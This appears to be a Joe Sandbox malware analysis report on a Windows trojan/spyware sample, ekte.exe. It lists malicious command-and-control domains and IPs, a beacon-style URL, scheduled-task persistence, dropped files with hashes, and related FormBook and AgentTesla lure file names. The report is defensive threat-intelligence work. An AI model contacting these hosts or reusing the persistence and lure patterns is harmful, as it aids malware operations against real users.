                                                                    http://crl.entrust.net/server1.crl0ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://ocsp.entrust.net03ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.diginotar.nl/cps/pkioverheid0ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchfindstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drfalse
                                                                        		unknown
                                                                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0findstr.exe, 00000013.00000002.627150947.00000000029DC000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.476232018.000000000150C000.00000004.80000000.00040000.00000000.sdmp, ekte.exe, eFDiSxeTfjUqTk.exe.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://www.google.com/favicon.ico6z95F416.19.drfalse
                                                                          		unknown
                                                                          https://ac.ecosia.org/autocomplete?q=findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://rockbull.pro/0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3Jjfindstr.exe, 00000013.00000002.627150947.0000000002F56000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000003126000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://ocsp.entrust.net0Dekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameekte.exe, 00000000.00000002.376498845.000000000290A000.00000004.00000800.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409956396.00000000023BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://secure.comodo.com/CPS0ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://crl.entrust.net/2048ca.crl0ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.sqlite.org/copyright.html.findstr.exe, 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drfalse
                                                                                		unknown

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                162.0.238.246
                                                                                		www.guldeu.xyzCanada
                                                                                		22612NAMECHEAP-NETUStrue
                                                                                15.197.148.33
                                                                                		childlesscatlady.todayUnited States
                                                                                		7430TANDEMUStrue
                                                                                45.33.6.223
                                                                                		www.sqlite.orgUnited States
                                                                                		63949LINODE-APLinodeLLCUSfalse
                                                                                185.174.173.22
                                                                                		rockbull.proUkraine
                                                                                		21100ITLDC-NLUAtrue
                                                                                3.33.130.190
                                                                                		deikamalaharris.infoUnited States
                                                                                		8987AMAZONEXPANSIONGBtrue
                                                                                206.119.82.148
                                                                                		wdgb23.topUnited States
                                                                                		174COGENT-174UStrue

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1538477
                                                                                Start date and time:2024-10-21 13:13:44 +02:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 10m 21s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                Number of analysed new started processes analysed:23
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:2
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:ekte.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@24/19@12/6
                                                                                EGA Information:
                                                                                • Successful, ratio: 66.7%
                                                                                HCA Information:
                                                                                • Successful, ratio: 89%
                                                                                • Number of executed functions: 136
                                                                                • Number of non-executed functions: 195
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 23.77.197.180, 23.77.197.145
                                                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                                                                                • Execution Graph export aborted for target eFDiSxeTfjUqTk.exe, PID 3056 because there are no executed function
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: ekte.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                04:14:47Task SchedulerRun new task: eFDiSxeTfjUqTk path: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
                                                                                07:14:40API Interceptor60x Sleep call for process: ekte.exe modified
                                                                                07:14:43API Interceptor86x Sleep call for process: powershell.exe modified
                                                                                07:14:44API Interceptor5x Sleep call for process: schtasks.exe modified
                                                                                07:14:48API Interceptor160x Sleep call for process: taskeng.exe modified
                                                                                07:14:49API Interceptor56x Sleep call for process: eFDiSxeTfjUqTk.exe modified
                                                                                07:15:19API Interceptor2590x Sleep call for process: BuhvZTwGQCD.exe modified
                                                                                07:15:23API Interceptor2336216x Sleep call for process: findstr.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                162.0.238.246EKTEDIR.exeGet hashmaliciousFormBookBrowse
                                                                                • www.guldeu.xyz/qd68/
                                                                                lByv6mqTCJ.exeGet hashmaliciousFormBookBrowse
                                                                                • www.jophy.life/umni/
                                                                                Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                • www.kilbmn.xyz/a8og/?EZ2lo=63Tp62CKGmWe748Q5xeLHwHqlS9/zq85FZX5ThSUZXnn1SRB3dZnoH27TzC6blggGQlMUKSAP7YLOcUQh9GTRQVuzTmijcvuIWv8RUIdN7d1j+xO0w==&7NP=7FXXUPl
                                                                                DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                • www.buyiop.online/r6mm/
                                                                                z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • www.huyven.xyz/dbbh/
                                                                                Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                • www.mistsui.top/r48b/
                                                                                RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                • www.quantis.life/hczh/
                                                                                LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                • www.inchey.online/ercr/
                                                                                15.197.148.33IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                                                • www.jilifish.win/to3j/
                                                                                AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                • www.1clickw2.net/9bnb/
                                                                                BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                • www.ethetf.digital/m7sk/
                                                                                LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                • www.warriorsyndrome.net/yaso/
                                                                                firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                • 15.197.148.33/
                                                                                firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                • 15.197.148.33/
                                                                                firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                • 15.197.148.33/
                                                                                firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                • 15.197.148.33/
                                                                                fptlVDDPkS.dllGet hashmaliciousQuasarBrowse
                                                                                • freegeoip.net/xml/
                                                                                zE7Ken4cFt.dllGet hashmaliciousQuasarBrowse
                                                                                • freegeoip.net/xml/
                                                                                45.33.6.223IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                                                • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                                                SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                                                New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                • www.sqlite.org/2019/sqlite-dll-win32-x86-3280000.zip
                                                                                BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
                                                                                FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                                                • www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
                                                                                SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                                                • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                                                LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                • www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
                                                                                ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                • www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
                                                                                RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                                                                                • www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip
                                                                                Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                                                • www.sqlite.org/2018/sqlite-dll-win32-x86-3220000.zip

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                www.martaschrimpf.infoEKTEDIR.exeGet hashmaliciousFormBookBrowse
                                                                                • 208.91.197.27
                                                                                9vhyFG1hNa.exeGet hashmaliciousFormBookBrowse
                                                                                • 208.91.197.27
                                                                                RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                • 208.91.197.27
                                                                                Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                                • 208.91.197.27
                                                                                Quote #270924.exeGet hashmaliciousFormBookBrowse
                                                                                • 208.91.197.27
                                                                                bg.microsoft.map.fastly.nethttps://library.wic.ac.uk/upload/~/app/step2.php?id=37602430Get hashmaliciousUnknownBrowse
                                                                                • 199.232.210.172
                                                                                https://library.wic.ac.uk/upload/~/app/step3.php?id=5384235Get hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbsGet hashmaliciousGuLoaderBrowse
                                                                                • 199.232.214.172
                                                                                Message_2530136.emlGet hashmaliciousUnknownBrowse
                                                                                • 199.232.210.172
                                                                                https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9Get hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                http://evriservicescompany.com/Get hashmaliciousUnknownBrowse
                                                                                • 199.232.210.172
                                                                                d600758023374f78d58acafbcaf94af66ad203b28e22a.exeGet hashmaliciousQuasarBrowse
                                                                                • 199.232.214.172
                                                                                lvXRlexBnb.exeGet hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                flX5YA1C09.exeGet hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                www.guldeu.xyzEKTEDIR.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.0.238.246

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                NAMECHEAP-NETUSrDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.0.229.222
                                                                                arm4.elfGet hashmaliciousUnknownBrowse
                                                                                • 162.0.234.179
                                                                                https://sites.google.com/view/hffgshfgsqfgsqf/homeGet hashmaliciousUnknownBrowse
                                                                                • 162.255.118.66
                                                                                http://hotautodetail.com/goe-=bleass=america=donal=q82h-=1Get hashmaliciousUnknownBrowse
                                                                                • 68.65.122.217
                                                                                890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                • 162.0.225.218
                                                                                seethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                • 162.213.249.216
                                                                                Play_VoiceMsg_daniel.rivera2@adiglobal.com_{RANDOM_NUMBER6}CQDM.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                • 162.213.250.202
                                                                                [EXT] New V-M Received for Dan.holifield 1fe51c9b2b1a7f7253a1febda3c0db05 .emlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                • 162.0.225.117
                                                                                http://Evie.nativeroads.net/open.aspx?ffcb10-fec7157773620479-fe5117777c63077b7210-fe3b11727364047e711470-ff981172-fe4910787d620d747112-ff61137775&d=120023&bmt=0Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                • 162.0.225.117
                                                                                https://treezor.optotume.com/856pTItHVdIRQMpSQdGq/EosxsR9VnD/dOTE831awoybi0xgen/ASgfhhM/856pTItHVdIRQMpSQdGq/Sales/qt1vtX/treezor.com/856pTItHVdIRQMpSQdGqEosxsR9VnDGet hashmaliciousUnknownBrowse
                                                                                • 198.54.115.71
                                                                                TANDEMUSIND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 15.197.148.33
                                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                • 155.208.85.234
                                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                                • 16.252.73.149
                                                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 15.198.96.79
                                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                                • 16.252.73.153
                                                                                DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                • 15.197.204.56
                                                                                https://jobs.sap.com/job/Walldorf-Partner-Engagement-Senior-Specialist-Expert-SAP-Signavio-%28mfd%29-%28limited-for-1-year%29-69190/1114958501/Get hashmaliciousUnknownBrowse
                                                                                • 15.197.193.217
                                                                                https://jobs.sap.com/job/Walldorf-Technical-Project-Manager-%28fmd%29-69190/1108826801/Get hashmaliciousUnknownBrowse
                                                                                • 15.197.193.217
                                                                                https://mcafeeinc-mkt-prod2-t.adobe-campaign.com/r/?id=hf505ba5a,7e223f22,7e22536b&e=cDE9JmFmZmlkPTAmY3VsdHVyZT1FTi1VUyZ0az1OUEdkMGVLcjd3SG1jVnF2cHQ2RFpYY3FIbHZlc3lGV1hZN3R5a0ZDTGJWX210NUlTX09UaTEwa291MG15NkZqMCZ0cD02NSZhdD14dXVlczNIRXpPbk45bE5wZzFoMnlFSEpTNnlSSnQxMk4xSzA3N2pHR083QTRYdVdQTzNlNXZmLVdKcUFQQzZYMCZwMj0wMjQvXzAgX29sX2lzX1NlbmRMaW5rX0tleUNhcmRfRE0zMzY4MDkwJnAzPURNMzM2ODA5MA&s=JTMn_G5VW0V9WjEy6_Fw8uIaCQd67lmwdVLQnjaD0bAGet hashmaliciousUnknownBrowse
                                                                                • 15.197.193.217
                                                                                https://finaltestwebsite.duckdns.org/UpdateVerifyPrss!/Scotiabank/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                • 15.197.193.217
                                                                                LINODE-APLinodeLLCUSIND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 45.33.6.223
                                                                                la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                • 172.104.125.52
                                                                                sparc.elfGet hashmaliciousUnknownBrowse
                                                                                • 103.3.63.184
                                                                                la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                • 198.74.57.190
                                                                                SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                • 45.33.6.223
                                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 45.79.58.115
                                                                                17291572854cc9a756b19449615607a5b810bcd9b747e17a6d30707cd1749cb754a28fb507530.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                                • 198.58.98.151
                                                                                i6.elfGet hashmaliciousUnknownBrowse
                                                                                • 172.104.115.20
                                                                                17291572854cc9a756b19449615607a5b810bcd9b747e17a6d30707cd1749cb754a28fb507530.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                                • 198.58.98.151
                                                                                mips.elfGet hashmaliciousMiraiBrowse
                                                                                • 172.105.8.48
                                                                                ITLDC-NLUArPDG8838EHU0309-XYSUJ288399-PQSHXII399.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.174.175.187
                                                                                DHL TRACKING NUMBER.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 217.12.218.219
                                                                                EKTEDIR.exeGet hashmaliciousFormBookBrowse
                                                                                • 185.174.173.22
                                                                                UUNbg1gvrR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 217.12.218.219
                                                                                Quote101024.docGet hashmaliciousVIP KeyloggerBrowse
                                                                                • 217.12.218.219
                                                                                99HGuuYvKA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.174.173.22
                                                                                sse5JV1aR1.exeGet hashmaliciousFormBookBrowse
                                                                                • 185.174.173.22
                                                                                QmVWuHXmm9.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.174.173.22
                                                                                1YxRjAO7k2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.174.173.22
                                                                                9vhyFG1hNa.exeGet hashmaliciousFormBookBrowse
                                                                                • 185.174.173.22

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Users\user\AppData\Local\Temp\sqlite3.dllSecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                                                  tEBdYCAxQC.rtfGet hashmaliciousFormBookBrowse
                                                                                    product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
                                                                                      PAYROLL.docGet hashmaliciousFormBookBrowse
                                                                                        PAYROLL.docGet hashmaliciousFormBookBrowse
                                                                                          SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtfGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            d0#U10dc.xlsGet hashmaliciousFormBookBrowse
                                                                                              PO_JP233001_708.xlsGet hashmaliciousFormBookBrowse
                                                                                                Shipping Documents PL CI.docGet hashmaliciousFormBookBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3180000[1].zip

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                  Category:dropped
                                                                                                  Size (bytes):443612
                                                                                                  Entropy (8bit):7.998557897787061
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:12288:hWVnSHJ7x6kXRxT5Na4Bz1am34CpgXzOZPf:FHJF6ORxT5ci51Jpgjqf
                                                                                                  MD5:ECC8AC417181D4885EF8C208D1F073DC
                                                                                                  SHA1:33154E45485BC0AE3BB0203FFCB9BAAAED4038D3
                                                                                                  SHA-256:D01C69D09282F9050F6B113C45884FE9B9ABF3BDF5BD93B45927D9B6BFB233FE
                                                                                                  SHA-512:F7601763447BED9B7B45FEF2BD584DA669636D2657C6066516C949E713CE1CAF0641A1889345E92E584B84F438FA19029D13C6F6F1583D35FCC1EB3F998631DA
                                                                                                  Malicious:false
                                                                                                  Preview:PK..........~Jg.Z.............sqlite3.defUT...%..X%..Xux.........d.......&....6......9.$..\..nj....==O...F...4.O.........._...%..*..Il..MD....>.&Y.St.~.6(g.x..=......".=...|..`...[.....].Y.y$o.q..4k.L.u+...5'...@....S.......r.s..|}.Yo.U..M...nyP:...|..8......`9. ..._.<..P..."..s...........H.8.F..../.....H..[.Nk.q...,..T.s@U2.G.1GR8..S.".......L9N.....*?..S.R5....3..-s^m.|.Q..p....Ms2.&.a'_.x.'.t.8].{.lW.......&..Of..a..*......i.k.4.&^..5F_*..e..[..g.=.8.Cs2.qK.M>(.<.u...a)..V..%.)w......ct..."...Q...w..`r.0.3M."...9...M`.>!Z.#R;...........k:.[.l.....Bl..>@.a.....(T..b1/.4..Px.I.)+...KLz...B..6...G.>..K..Gbu.#..c.`,.B.y.]..........K{[A.....q..?..q6v^...of..V....];?#.v..I1=.m..R....]n.6.W..bv..]...'J.O....e3...@...E. 6..M..k..@.7.4.]@;.*..1.sq.P.v..MA/.....W!G..6....a.R<..XT5..U&........(.N.f#.7.ck..].b>8....(.Xq`..p;...Ljt.....t.lW......5O....3|}.=........8..o.......Fn.........Lp..As.&..i8)........n-......+1......z.q.....@.$7Tw..".L.|...

                                                                                                  C:\Users\user\AppData\Local\Temp\2ls1flhm.rsh.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\6jkxvjx.zip

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                  Category:dropped
                                                                                                  Size (bytes):443612
                                                                                                  Entropy (8bit):7.998557897787061
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:12288:hWVnSHJ7x6kXRxT5Na4Bz1am34CpgXzOZPf:FHJF6ORxT5ci51Jpgjqf
                                                                                                  MD5:ECC8AC417181D4885EF8C208D1F073DC
                                                                                                  SHA1:33154E45485BC0AE3BB0203FFCB9BAAAED4038D3
                                                                                                  SHA-256:D01C69D09282F9050F6B113C45884FE9B9ABF3BDF5BD93B45927D9B6BFB233FE
                                                                                                  SHA-512:F7601763447BED9B7B45FEF2BD584DA669636D2657C6066516C949E713CE1CAF0641A1889345E92E584B84F438FA19029D13C6F6F1583D35FCC1EB3F998631DA
                                                                                                  Malicious:false
                                                                                                  Preview:PK..........~Jg.Z.............sqlite3.defUT...%..X%..Xux.........d.......&....6......9.$..\..nj....==O...F...4.O.........._...%..*..Il..MD....>.&Y.St.~.6(g.x..=......".=...|..`...[.....].Y.y$o.q..4k.L.u+...5'...@....S.......r.s..|}.Yo.U..M...nyP:...|..8......`9. ..._.<..P..."..s...........H.8.F..../.....H..[.Nk.q...,..T.s@U2.G.1GR8..S.".......L9N.....*?..S.R5....3..-s^m.|.Q..p....Ms2.&.a'_.x.'.t.8].{.lW.......&..Of..a..*......i.k.4.&^..5F_*..e..[..g.=.8.Cs2.qK.M>(.<.u...a)..V..%.)w......ct..."...Q...w..`r.0.3M."...9...M`.>!Z.#R;...........k:.[.l.....Bl..>@.a.....(T..b1/.4..Px.I.)+...KLz...B..6...G.>..K..Gbu.#..c.`,.B.y.]..........K{[A.....q..?..q6v^...of..V....];?#.v..I1=.m..R....]n.6.W..bv..]...'J.O....e3...@...E. 6..M..k..@.7.4.]@;.*..1.sq.P.v..MA/.....W!G..6....a.R<..XT5..U&........(.N.f#.7.ck..].b>8....(.Xq`..p;...Ljt.....t.lW......5O....3|}.=........8..o.......Fn.........Lp..As.&..i8)........n-......+1......z.q.....@.$7Tw..".L.|...

                                                                                                  C:\Users\user\AppData\Local\Temp\6z95F416

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):77824
                                                                                                  Entropy (8bit):1.0714656887192844
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:LSe7mlcwilGc7Ha3f+uG01YLvqAogv5KzzUG+Qk/BuqBFzsCWo3qkrH1VumgXn:LscflGwucCaM0f6kL1Vumi
                                                                                                  MD5:9867F6F82F226DE748557B47C82BE25D
                                                                                                  SHA1:B10DE25FA81662E082C60C8700E348C19AE7404B
                                                                                                  SHA-256:CCB153269D92EC65916497E01D0E63A4A61767603EBB226FFD35DCC983B62A55
